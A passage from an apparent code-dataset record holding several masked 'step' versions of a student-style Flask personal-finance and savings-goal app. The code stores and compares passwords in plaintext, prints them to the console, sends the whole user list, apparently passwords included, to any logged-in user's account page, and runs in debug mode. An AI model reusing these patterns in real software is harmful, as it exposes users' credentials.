render_template('goals.html', bal=bal, income=inc)\n else:\n return render_template('goals.html')\n\n\[email protected]('/gcalc', methods=['POST'])\ndef gcalc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n goal_name = request.form['goal']\n goal_price = request.form['goal_price'][1:]\n percentage = request.form['slide']\n print('This is percentage:')\n print(percentage)\n print('gcalc')\n print(goal_name)\n print(goal_price)\n user_id = db.search_user_list(session['username'])[0][2]\n db.add_goals(goal_name, goal_price, percentage, user_id)\n a = db.search_image_list(user_id)\n print(a)\n if a == [] or a[0][2] != goal_name:\n try:\n l = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ',\n '+') + '&image_type=photo')\n p = json.loads(l.read())\n img = p['hits'][0]['webformatURL']\n except:\n return render_template('error.html', err=\n 'Cannot connect to API', fix=\n 'Try refreshing or contacting the site owner')\n else:\n img = a[0][1]\n db.add_images(img, goal_name, user_id)\n flash(f'Goal for {goal_name} at ${goal_price} has been added!')\n return redirect(url_for('home'))\n\n\[email protected]('/sankey')\ndef sankey():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('sankey.html', idnum=user_id)\n\n\[email protected]('/pie')\ndef pie():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('pie.html', idnum=user_id)\n\n\[email protected]('/area')\ndef area():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n goal = db.search_goal_list(user_id)\n if goal == []:\n return redirect(url_for('goals'))\n daily = db.search_expense_list(user_id)\n monthly = db.search_monthly_list(user_id)\n dadict = {}\n modict = {}\n print(goal)\n ratings = {}\n for names in daily:\n dadict[names[0]] = names[1]\n for names in monthly:\n modict[names[0]] = names[1]\n print(dadict, modict)\n percent = 0\n for names in db.search_rating_list(user_id):\n print(names)\n if names[0] in modict:\n percent = modict[names[0]] * 12 / goal[0][1]\n if names[0] in dadict:\n percent = dadict[names[0]] * 30 * 12 / goal[0][1]\n if names[1] <= 6 and percent >= 0.05:\n ratings[names[0]] = names[1], percent\n print(ratings)\n return render_template('area.html', idnum=user_id, ratings=ratings)\n\n\[email protected]('/logout')\ndef logout():\n if 'username' in session:\n session.pop('username')\n return redirect(url_for('home'))\n\n\[email protected]('/account')\ndef account():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_list = json.dumps(db.search_user_list(ret_all=True))\n print(json.dumps(db.search_user_list(ret_all=True)))\n return render_template('accounts.html', user_list=user_list)\n\n\[email protected]('/update', methods=['POST'])\ndef update():\n print('this is the updates')\n update_dict = request.form['all-options']\n update_dict = json.loads(update_dict)\n print(request.form)\n user_ids = db.search_user_list(session['username'])\n user = user_ids[0][-1]\n print(user)\n db.update_user_list(update_dict['username'] or user_ids[0][0], \n update_dict['password'] or user_ids[0][1], user)\n db.reset_statistics(user, update_dict['reset'])\n session.pop('username')\n session['username'] = update_dict['username'] or user_ids[0][0]\n flash('Account information updated successfully')\n return redirect(url_for('home'))\n\n\[email protected]('/del')\ndef delete():\n if 'username' not in session:\n flash(\"Woops. You can't be here\")\n return redirect(url_for('login'))\n user = db.search_user_list(session['username'])[0][-1]\n print(user)\n db.update_user_list(None, None, user, rem=True)\n flash('User successfully removed')\n session.pop('username')\n return redirect(url_for('home'))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/')\ndef home():\n if 'username' in session:\n id_num = db.search_user_list(session['username'], is_usrname=True)[0][2\n ]\n finavail = db.search_finance_list(id_num)\n goalavail = db.search_goal_list(id_num)\n if finavail:\n session['finances'] = session['username']\n if goalavail:\n session['goals'] = session['username']\n set_goal = db.search_goal_list(id_num)\n print(set_goal)\n if set_goal != []:\n user_id = db.search_user_list(session['username'], is_usrname=True\n )[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now),\n '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('home.html', fin=finavail, goal=\n goalavail, set_goal=set_goal, goal_name=g,\n goal_price=price, perc_inc=perc, image=img, bal=bal,\n income=inc, months=delta_months, perc_comp=\n perc_complete * 100)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html')\n\n\[email protected]('/register')\ndef register():\n return render_template('register.html')\n\n\[email protected]('/login')\ndef login():\n return render_template('login.html')\n\n\[email protected]('/auth', methods=['POST'])\ndef auth():\n user = request.form.get('user')\n paswrd = request.form.get('pass')\n if request.form.get('submit') == 'Register':\n paswrd2 = request.form.get('pass2')\n print(paswrd)\n print(paswrd2)\n if paswrd != paswrd2:\n flash('Passwords Do Not Match')\n return redirect(url_for('register'))\n if db.register(user, paswrd):\n flash('Registered successfully')\n session['username'] = request.form['user']\n else:\n flash('Unable to register the user')\n return redirect(url_for('register'))\n print('Username has been registered previously!')\n else:\n match = db.search_user_list(user, is_usrname=True)\n if len(match) > 0:\n if match[0][1] == paswrd:\n session['username'] = request.form['user']\n else:\n flash('wrong Password')\n return redirect(url_for('login'))\n else:\n flash('User not found')\n return redirect(url_for('login'))\n return redirect(url_for('home'))\n\n\[email protected]('/finances')\ndef finance():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n items = db.search_finance_list(user_id)\n daily = db.search_expense_list(user_id, is_id=True)\n monthly = db.search_monthly_list(user_id, is_id=True)\n ratings = db.search_rating_list(user_id, is_id=True)\n print(ratings)\n print(f'Unlike month, this is daily: {daily}\\n')\n w = dict([(x[0], x[1]) for x in daily])\n s = dict([(x[0], x[1]) for x in monthly])\n r = dict([(x[0], x[1]) for x in ratings])\n print(f'THIS is monthly: {monthly}')\n print(f'THIS is s: {s}')\n print(f'These are the ratings: {r}')\n total = 0\n m_total = 0\n for x in w.values():\n total += float(x)\n for x in s.values():\n m_total += float(x)\n if items != []:\n bal, income, i = items[0]\n diction = {'Balance': bal, 'Income': income}\n return render_template('findata.html', diction=diction, daily=w,\n months=s, total=total, mtotal=m_total, completed=True, ratings=r)\n return render_template('findata.html')\n\n\[email protected]('/fincalc', methods=['POST'])\ndef calc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n session['finances'] = session['username']\n bal = request.form['balance'][1:]\n monthly = request.form['monthly-inputs']\n income = request.form['income'][1:]\n s = request.form\n d_rates = request.form['daily-importance']\n m_rates = request.form['monthly-importance']\n print(d_rates)\n user_id = db.search_user_list(session['username'])[0][2]\n daily_dict = json.loads(d_rates)\n monthly_dict = json.loads(m_rates)\n print(daily_dict)\n print(monthly_dict)\n dai_im = dict([x for x in daily_dict.values()])\n mon_im = dict([x for x in monthly_dict.values()])\n file = os.path.dirname(__file__) + f'/static/ratings.csv'\n stringg = '{'\n try:\n with open(file) as f:\n print('File found, not creating...')\n f.close()\n except Exception as e:\n print(e)\n with open(file, 'a+') as f:\n print('File not found, creating...')\n f.write(f'ratings,id\\n')\n f.close()\n for item in mon_im:\n db.add_rating(item, mon_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(mon_im[item]\n ) + \"'\" + ' '\n for item in dai_im:\n db.add_rating(item, dai_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(dai_im[item]\n ) + \"'\" + ' '\n stringg += '},' + str(user_id) + '\\n'\n with open(file, 'r') as f:\n lines = f.readlines()\n with open(file, 'w') as f:\n for line in lines:\n if str(user_id) != line.strip('\\n').split(',')[1]:\n f.write(line)\n f.write(stringg)\n f.close()\n daily = request.form['all-inputs']\n print(f'This is daily: {monthly}')\n daily = json.loads(daily)\n monthly = json.loads(monthly)\n print(f'This is daily now {monthly}')\n w = dict([x for x in daily.values()])\n m = dict([x for x in monthly.values()])\n print(f'\\nThis is calculated m:{m}\\n')\n db.add_finances(bal, m, income, w, user_id)\n flash('Finances updated')\n return redirect(url_for('home'))\n\n\[email protected]('/goals')\ndef goals():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now), '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img, bal=bal, income=inc, months=\n delta_months, perc_comp=perc_complete * 100)\n else:\n print('Used the second')\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img)\n elif b:\n return render_template('goals.html', bal=bal, income=inc)\n else:\n return render_template('goals.html')\n\n\[email protected]('/gcalc', methods=['POST'])\ndef gcalc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n goal_name = request.form['goal']\n goal_price = request.form['goal_price'][1:]\n percentage = request.form['slide']\n print('This is percentage:')\n print(percentage)\n print('gcalc')\n print(goal_name)\n print(goal_price)\n user_id = db.search_user_list(session['username'])[0][2]\n db.add_goals(goal_name, goal_price, percentage, user_id)\n a = db.search_image_list(user_id)\n print(a)\n if a == [] or a[0][2] != goal_name:\n try:\n l = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ',\n '+') + '&image_type=photo')\n p = json.loads(l.read())\n img = p['hits'][0]['webformatURL']\n except:\n return render_template('error.html', err=\n 'Cannot connect to API', fix=\n 'Try refreshing or contacting the site owner')\n else:\n img = a[0][1]\n db.add_images(img, goal_name, user_id)\n flash(f'Goal for {goal_name} at ${goal_price} has been added!')\n return redirect(url_for('home'))\n\n\[email protected]('/sankey')\ndef sankey():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('sankey.html', idnum=user_id)\n\n\[email protected]('/pie')\ndef pie():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('pie.html', idnum=user_id)\n\n\[email protected]('/area')\ndef area():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n goal = db.search_goal_list(user_id)\n if goal == []:\n return redirect(url_for('goals'))\n daily = db.search_expense_list(user_id)\n monthly = db.search_monthly_list(user_id)\n dadict = {}\n modict = {}\n print(goal)\n ratings = {}\n for names in daily:\n dadict[names[0]] = names[1]\n for names in monthly:\n modict[names[0]] = names[1]\n print(dadict, modict)\n percent = 0\n for names in db.search_rating_list(user_id):\n print(names)\n if names[0] in modict:\n percent = modict[names[0]] * 12 / goal[0][1]\n if names[0] in dadict:\n percent = dadict[names[0]] * 30 * 12 / goal[0][1]\n if names[1] <= 6 and percent >= 0.05:\n ratings[names[0]] = names[1], percent\n print(ratings)\n return render_template('area.html', idnum=user_id, ratings=ratings)\n\n\[email protected]('/logout')\ndef logout():\n if 'username' in session:\n session.pop('username')\n return redirect(url_for('home'))\n\n\[email protected]('/account')\ndef account():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_list = json.dumps(db.search_user_list(ret_all=True))\n print(json.dumps(db.search_user_list(ret_all=True)))\n return render_template('accounts.html', user_list=user_list)\n\n\[email protected]('/update', methods=['POST'])\ndef update():\n print('this is the updates')\n update_dict = request.form['all-options']\n update_dict = json.loads(update_dict)\n print(request.form)\n user_ids = db.search_user_list(session['username'])\n user = user_ids[0][-1]\n print(user)\n db.update_user_list(update_dict['username'] or user_ids[0][0], \n update_dict['password'] or user_ids[0][1], user)\n db.reset_statistics(user, update_dict['reset'])\n session.pop('username')\n session['username'] = update_dict['username'] or user_ids[0][0]\n flash('Account information updated successfully')\n return redirect(url_for('home'))\n\n\[email protected]('/del')\ndef delete():\n if 'username' not in session:\n flash(\"Woops. You can't be here\")\n return redirect(url_for('login'))\n user = db.search_user_list(session['username'])[0][-1]\n print(user)\n db.update_user_list(None, None, user, rem=True)\n flash('User successfully removed')\n session.pop('username')\n return redirect(url_for('home'))\n\n\n<mask token>\n",
"step-3": "<mask token>\nif template_path != '/templates':\n app = Flask('__main__', template_folder=os.path.dirname(__file__) +\n '/templates', static_folder=os.path.dirname(__file__) + '/static')\n file = open(os.path.dirname(__file__) + '/data/keys.json')\nelse:\n app = Flask('__main__')\n file = open('./data/keys.json')\n<mask token>\n\n\[email protected]('/')\ndef home():\n if 'username' in session:\n id_num = db.search_user_list(session['username'], is_usrname=True)[0][2\n ]\n finavail = db.search_finance_list(id_num)\n goalavail = db.search_goal_list(id_num)\n if finavail:\n session['finances'] = session['username']\n if goalavail:\n session['goals'] = session['username']\n set_goal = db.search_goal_list(id_num)\n print(set_goal)\n if set_goal != []:\n user_id = db.search_user_list(session['username'], is_usrname=True\n )[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now),\n '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('home.html', fin=finavail, goal=\n goalavail, set_goal=set_goal, goal_name=g,\n goal_price=price, perc_inc=perc, image=img, bal=bal,\n income=inc, months=delta_months, perc_comp=\n perc_complete * 100)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html')\n\n\[email protected]('/register')\ndef register():\n return render_template('register.html')\n\n\[email protected]('/login')\ndef login():\n return render_template('login.html')\n\n\[email protected]('/auth', methods=['POST'])\ndef auth():\n user = request.form.get('user')\n paswrd = request.form.get('pass')\n if request.form.get('submit') == 'Register':\n paswrd2 = request.form.get('pass2')\n print(paswrd)\n print(paswrd2)\n if paswrd != paswrd2:\n flash('Passwords Do Not Match')\n return redirect(url_for('register'))\n if db.register(user, paswrd):\n flash('Registered successfully')\n session['username'] = request.form['user']\n else:\n flash('Unable to register the user')\n return redirect(url_for('register'))\n print('Username has been registered previously!')\n else:\n match = db.search_user_list(user, is_usrname=True)\n if len(match) > 0:\n if match[0][1] == paswrd:\n session['username'] = request.form['user']\n else:\n flash('wrong Password')\n return redirect(url_for('login'))\n else:\n flash('User not found')\n return redirect(url_for('login'))\n return redirect(url_for('home'))\n\n\[email protected]('/finances')\ndef finance():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n items = db.search_finance_list(user_id)\n daily = db.search_expense_list(user_id, is_id=True)\n monthly = db.search_monthly_list(user_id, is_id=True)\n ratings = db.search_rating_list(user_id, is_id=True)\n print(ratings)\n print(f'Unlike month, this is daily: {daily}\\n')\n w = dict([(x[0], x[1]) for x in daily])\n s = dict([(x[0], x[1]) for x in monthly])\n r = dict([(x[0], x[1]) for x in ratings])\n print(f'THIS is monthly: {monthly}')\n print(f'THIS is s: {s}')\n print(f'These are the ratings: {r}')\n total = 0\n m_total = 0\n for x in w.values():\n total += float(x)\n for x in s.values():\n m_total += float(x)\n if items != []:\n bal, income, i = items[0]\n diction = {'Balance': bal, 'Income': income}\n return render_template('findata.html', diction=diction, daily=w,\n months=s, total=total, mtotal=m_total, completed=True, ratings=r)\n return render_template('findata.html')\n\n\[email protected]('/fincalc', methods=['POST'])\ndef calc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n session['finances'] = session['username']\n bal = request.form['balance'][1:]\n monthly = request.form['monthly-inputs']\n income = request.form['income'][1:]\n s = request.form\n d_rates = request.form['daily-importance']\n m_rates = request.form['monthly-importance']\n print(d_rates)\n user_id = db.search_user_list(session['username'])[0][2]\n daily_dict = json.loads(d_rates)\n monthly_dict = json.loads(m_rates)\n print(daily_dict)\n print(monthly_dict)\n dai_im = dict([x for x in daily_dict.values()])\n mon_im = dict([x for x in monthly_dict.values()])\n file = os.path.dirname(__file__) + f'/static/ratings.csv'\n stringg = '{'\n try:\n with open(file) as f:\n print('File found, not creating...')\n f.close()\n except Exception as e:\n print(e)\n with open(file, 'a+') as f:\n print('File not found, creating...')\n f.write(f'ratings,id\\n')\n f.close()\n for item in mon_im:\n db.add_rating(item, mon_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(mon_im[item]\n ) + \"'\" + ' '\n for item in dai_im:\n db.add_rating(item, dai_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(dai_im[item]\n ) + \"'\" + ' '\n stringg += '},' + str(user_id) + '\\n'\n with open(file, 'r') as f:\n lines = f.readlines()\n with open(file, 'w') as f:\n for line in lines:\n if str(user_id) != line.strip('\\n').split(',')[1]:\n f.write(line)\n f.write(stringg)\n f.close()\n daily = request.form['all-inputs']\n print(f'This is daily: {monthly}')\n daily = json.loads(daily)\n monthly = json.loads(monthly)\n print(f'This is daily now {monthly}')\n w = dict([x for x in daily.values()])\n m = dict([x for x in monthly.values()])\n print(f'\\nThis is calculated m:{m}\\n')\n db.add_finances(bal, m, income, w, user_id)\n flash('Finances updated')\n return redirect(url_for('home'))\n\n\[email protected]('/goals')\ndef goals():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now), '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img, bal=bal, income=inc, months=\n delta_months, perc_comp=perc_complete * 100)\n else:\n print('Used the second')\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img)\n elif b:\n return render_template('goals.html', bal=bal, income=inc)\n else:\n return render_template('goals.html')\n\n\[email protected]('/gcalc', methods=['POST'])\ndef gcalc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n goal_name = request.form['goal']\n goal_price = request.form['goal_price'][1:]\n percentage = request.form['slide']\n print('This is percentage:')\n print(percentage)\n print('gcalc')\n print(goal_name)\n print(goal_price)\n user_id = db.search_user_list(session['username'])[0][2]\n db.add_goals(goal_name, goal_price, percentage, user_id)\n a = db.search_image_list(user_id)\n print(a)\n if a == [] or a[0][2] != goal_name:\n try:\n l = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ',\n '+') + '&image_type=photo')\n p = json.loads(l.read())\n img = p['hits'][0]['webformatURL']\n except:\n return render_template('error.html', err=\n 'Cannot connect to API', fix=\n 'Try refreshing or contacting the site owner')\n else:\n img = a[0][1]\n db.add_images(img, goal_name, user_id)\n flash(f'Goal for {goal_name} at ${goal_price} has been added!')\n return redirect(url_for('home'))\n\n\[email protected]('/sankey')\ndef sankey():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('sankey.html', idnum=user_id)\n\n\[email protected]('/pie')\ndef pie():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('pie.html', idnum=user_id)\n\n\[email protected]('/area')\ndef area():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n goal = db.search_goal_list(user_id)\n if goal == []:\n return redirect(url_for('goals'))\n daily = db.search_expense_list(user_id)\n monthly = db.search_monthly_list(user_id)\n dadict = {}\n modict = {}\n print(goal)\n ratings = {}\n for names in daily:\n dadict[names[0]] = names[1]\n for names in monthly:\n modict[names[0]] = names[1]\n print(dadict, modict)\n percent = 0\n for names in db.search_rating_list(user_id):\n print(names)\n if names[0] in modict:\n percent = modict[names[0]] * 12 / goal[0][1]\n if names[0] in dadict:\n percent = dadict[names[0]] * 30 * 12 / goal[0][1]\n if names[1] <= 6 and percent >= 0.05:\n ratings[names[0]] = names[1], percent\n print(ratings)\n return render_template('area.html', idnum=user_id, ratings=ratings)\n\n\[email protected]('/logout')\ndef logout():\n if 'username' in session:\n session.pop('username')\n return redirect(url_for('home'))\n\n\[email protected]('/account')\ndef account():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_list = json.dumps(db.search_user_list(ret_all=True))\n print(json.dumps(db.search_user_list(ret_all=True)))\n return render_template('accounts.html', user_list=user_list)\n\n\[email protected]('/update', methods=['POST'])\ndef update():\n print('this is the updates')\n update_dict = request.form['all-options']\n update_dict = json.loads(update_dict)\n print(request.form)\n user_ids = db.search_user_list(session['username'])\n user = user_ids[0][-1]\n print(user)\n db.update_user_list(update_dict['username'] or user_ids[0][0], \n update_dict['password'] or user_ids[0][1], user)\n db.reset_statistics(user, update_dict['reset'])\n session.pop('username')\n session['username'] = update_dict['username'] or user_ids[0][0]\n flash('Account information updated successfully')\n return redirect(url_for('home'))\n\n\[email protected]('/del')\ndef delete():\n if 'username' not in session:\n flash(\"Woops. You can't be here\")\n return redirect(url_for('login'))\n user = db.search_user_list(session['username'])[0][-1]\n print(user)\n db.update_user_list(None, None, user, rem=True)\n flash('User successfully removed')\n session.pop('username')\n return redirect(url_for('home'))\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n",
"step-4": "import os, datetime\nimport urllib\nfrom flask import Flask, flash, json, jsonify, redirect, render_template, request, session, url_for\nimport util.database as db\ntemplate_path = os.path.dirname(__file__) + '/templates'\nfile = ''\nif template_path != '/templates':\n app = Flask('__main__', template_folder=os.path.dirname(__file__) +\n '/templates', static_folder=os.path.dirname(__file__) + '/static')\n file = open(os.path.dirname(__file__) + '/data/keys.json')\nelse:\n app = Flask('__main__')\n file = open('./data/keys.json')\napp.secret_key = os.urandom(32)\ncontent = file.read()\nkeys = json.loads(content)\nPIXABAY_KEY = keys['Pixabay']\nPIXABAY_STUB = 'https://pixabay.com/api/?key=' + PIXABAY_KEY + '&q='\n\n\[email protected]('/')\ndef home():\n if 'username' in session:\n id_num = db.search_user_list(session['username'], is_usrname=True)[0][2\n ]\n finavail = db.search_finance_list(id_num)\n goalavail = db.search_goal_list(id_num)\n if finavail:\n session['finances'] = session['username']\n if goalavail:\n session['goals'] = session['username']\n set_goal = db.search_goal_list(id_num)\n print(set_goal)\n if set_goal != []:\n user_id = db.search_user_list(session['username'], is_usrname=True\n )[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now),\n '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('home.html', fin=finavail, goal=\n goalavail, set_goal=set_goal, goal_name=g,\n goal_price=price, perc_inc=perc, image=img, bal=bal,\n income=inc, months=delta_months, perc_comp=\n perc_complete * 100)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html')\n\n\[email protected]('/register')\ndef register():\n return render_template('register.html')\n\n\[email protected]('/login')\ndef login():\n return render_template('login.html')\n\n\[email protected]('/auth', methods=['POST'])\ndef auth():\n user = request.form.get('user')\n paswrd = request.form.get('pass')\n if request.form.get('submit') == 'Register':\n paswrd2 = request.form.get('pass2')\n print(paswrd)\n print(paswrd2)\n if paswrd != paswrd2:\n flash('Passwords Do Not Match')\n return redirect(url_for('register'))\n if db.register(user, paswrd):\n flash('Registered successfully')\n session['username'] = request.form['user']\n else:\n flash('Unable to register the user')\n return redirect(url_for('register'))\n print('Username has been registered previously!')\n else:\n match = db.search_user_list(user, is_usrname=True)\n if len(match) > 0:\n if match[0][1] == paswrd:\n session['username'] = request.form['user']\n else:\n flash('wrong Password')\n return redirect(url_for('login'))\n else:\n flash('User not found')\n return redirect(url_for('login'))\n return redirect(url_for('home'))\n\n\[email protected]('/finances')\ndef finance():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n items = db.search_finance_list(user_id)\n daily = db.search_expense_list(user_id, is_id=True)\n monthly = db.search_monthly_list(user_id, is_id=True)\n ratings = db.search_rating_list(user_id, is_id=True)\n print(ratings)\n print(f'Unlike month, this is daily: {daily}\\n')\n w = dict([(x[0], x[1]) for x in daily])\n s = dict([(x[0], x[1]) for x in monthly])\n r = dict([(x[0], x[1]) for x in ratings])\n print(f'THIS is monthly: {monthly}')\n print(f'THIS is s: {s}')\n print(f'These are the ratings: {r}')\n total = 